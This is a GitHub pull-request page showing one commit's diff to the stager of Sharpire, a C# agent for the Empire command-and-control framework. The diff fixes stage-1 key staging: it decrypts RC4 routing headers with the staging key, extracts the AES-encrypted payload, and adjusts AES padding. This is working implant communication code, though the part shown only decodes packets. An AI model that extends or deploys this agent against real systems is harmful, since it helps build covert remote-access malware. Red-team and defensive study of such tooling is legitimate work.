Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update C# agent to use DH keys and wrap routing packets #7

Open
wants to merge 9 commits into
base: v6.0-dev
Choose a base branch
from
Open

Update C# agent to use DH keys and wrap routing packets #7

Changes from 1 commit
Commits
Show all changes
9 commits
Select commit Hold shift + click to select a range
3ea0520
sharing keys
Cx01N Feb 28, 2025
f4f503d
fixed stage 1 aes
Cx01N Feb 28, 2025
b800567
staging and keys work
Cx01N Mar 1, 2025
3825796
fixed tasking returns
Cx01N Mar 1, 2025
be6ea1c
cleaned up stager.cs
Cx01N Mar 1, 2025
7d67cf8
cleaned up agent.cs
Cx01N Mar 1, 2025
cfa182b
updated comms and taskuri/profiles
Cx01N Mar 1, 2025
1bae60e
removed powershell agent launching
Cx01N Mar 1, 2025
19967f1
agent comms cleanup and sessioninfo
Cx01N Mar 1, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Prev Previous commit
Next Next commit
fixed stage 1 aes
  • Loading branch information
@Cx01N
Cx01N committed Feb 28, 2025
commit f4f503dffc1ade0d8fafd1977c656d101d51884f
45 changes: 23 additions & 22 deletions Sharpire/Empire.Agent.Stager.cs
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -267,14 +267,10 @@ private byte[] Stage1()

// Receive Server Response
RoutingPacket packet = DecodeRoutingPacket(response);
if (packet == null || packet.DecryptedData.Length == 0)
{
Console.WriteLine("Failed to decode routing packet.");
return null;
}
this.sessionInfo.SetAgentID(packet.SessionId);

// Extract and Generate Shared Secret
byte[] decryptedData = AesDecryptAndVerify(stagingKeyBytes, packet.DecryptedData);
byte[] decryptedData = AesDecryptAndVerify(stagingKeyBytes, packet.EncryptedData);
byte[] nonce = decryptedData.Take(16).ToArray();
byte[] serverPubKey = decryptedData.Skip(16).ToArray();

Expand All @@ -284,7 +280,6 @@ private byte[] Stage1()
return nonce;
}


private RoutingPacket DecodeRoutingPacket(byte[] packetData)
{
if (packetData.Length < 20)
Expand All @@ -294,6 +289,7 @@ private RoutingPacket DecodeRoutingPacket(byte[] packetData)
}

int offset = 0;

while (offset < packetData.Length)
{
byte[] routingPacket = packetData.Skip(offset).Take(20).ToArray();
Expand All @@ -304,43 +300,46 @@ private RoutingPacket DecodeRoutingPacket(byte[] packetData)
byte[] stagingKey = sessionInfo.GetStagingKeyBytes();
byte[] rc4Key = Misc.combine(routingInitializationVector, stagingKey);

Console.WriteLine($"Full Packet Data Length: {packetData.Length}");
Console.WriteLine($"Encrypted Data Length: {routingEncryptedData.Length}");
Console.WriteLine($"RC4 Key Length: {rc4Key.Length}");

// ✅ Decrypt the first 20 bytes using RC4
byte[] routingData = EmpireStager.rc4Encrypt(rc4Key, routingEncryptedData);
Console.WriteLine($"Decrypted Routing Data Length: {routingData.Length}");
Console.WriteLine("Decrypted Routing Data (Hex): " + BitConverter.ToString(routingData.Take(32).ToArray()));

if (routingData.Length < 16)
{
Console.WriteLine($"Decryption failed, output length: {routingData.Length}");
return null;
}

// ✅ Extract fields from the decrypted Routing Data
string packetSessionId = Encoding.UTF8.GetString(routingData.Take(8).ToArray());

byte language = 0;
byte metaData = 0;
try
{
language = routingPacket[8];
metaData = routingPacket[9];
}
catch (IndexOutOfRangeException)
{
}

byte[] extra = routingPacket.Skip(10).Take(2).ToArray();
byte language = routingData[8];
byte metaData = routingData[9];
byte[] extra = routingData.Skip(10).Take(2).ToArray();
uint packetLength = BitConverter.ToUInt32(routingData, 12);
Console.WriteLine($"Extracted Packet Length: {packetLength}");

if (packetLength == 0)
if (packetLength == 0 || packetLength > packetData.Length - offset)
{
Console.WriteLine("Invalid packet length.");
return null;
}

// ✅ Extract the remaining **AES-encrypted** data
byte[] encryptedData = packetData.Skip(offset).Take((int)packetLength).ToArray();
Console.WriteLine($"Extracted Encrypted Data Length: {encryptedData.Length}");


return new RoutingPacket
{
InitializationVector = routingInitializationVector,
EncryptedData = routingEncryptedData,
DecryptedData = routingData,
EncryptedData = encryptedData,
DecryptedData = null,
SessionId = packetSessionId,
Language = language,
MetaData = metaData,
Expand All @@ -352,6 +351,7 @@ private RoutingPacket DecodeRoutingPacket(byte[] packetData)
return null;
}


////////////////////////////////////////////////////////////////////////////////
//
////////////////////////////////////////////////////////////////////////////////
Expand Down Expand Up @@ -642,6 +642,7 @@ public static byte[] aesDecrypt(byte[] key, byte[] data)
using (AesCryptoServiceProvider aesCrypto = new AesCryptoServiceProvider())
{
aesCrypto.Mode = CipherMode.CBC;
aesCrypto.Padding = PaddingMode.PKCS7;
aesCrypto.Key = key;
aesCrypto.IV = iv;
return aesCrypto.CreateDecryptor().TransformFinalBlock(cipherText, 0, cipherText.Length);
Expand Down